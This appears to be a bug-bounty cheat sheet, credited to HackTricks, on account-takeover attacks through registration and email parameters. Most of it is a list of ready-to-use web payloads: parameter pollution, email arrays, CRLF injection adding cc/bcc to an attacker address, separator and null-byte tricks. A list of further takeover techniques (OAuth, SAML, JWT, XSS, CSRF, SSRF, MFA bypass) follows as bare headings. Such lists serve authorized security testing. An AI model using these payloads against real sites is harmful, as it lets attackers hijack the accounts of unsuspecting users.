Registration & Takeover Bugs
( Credits: HackTricks )
ATO from manipulating the email Parameter
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
#No domain:
email=victim
#No TLD (Top Level Domain):
email=victim@xyz
#change param case
email=victim@mail.com&Email=attacker@mail.com
email@email.com**,**victim@hack.secry
email@email**“,”**victim@hack.secry
email@email.com**:**victim@hack.secry
email@email.com**%0d%0a**victim@hack.secry
**%0d%0a**victim@hack.secry
**%0a**victim@hack.secry
victim@hack.secry**%0d%0a**
victim@hack.secry**%0a**
victim@hack.secry**%0d**
victim@hack.secry**%00**
victim@hack.secry**{{}}**ATO Via Request Smuggling
Duplicate Registration
SQL Injection
OAUTH Takeovers
SAML Vulnerabilities
Change email Feature
More Checks
Password Reset Takeover
Leaking Sensitive Info in Response
IDOR on API Parameters
XSS to ATO
CSRF to ATO
ATO via JWT
Using MFA/OTP issues
Authentication Bypass Via Response Manipulation
SSRF to ATO
Remote session Fixation to ATO
Last updated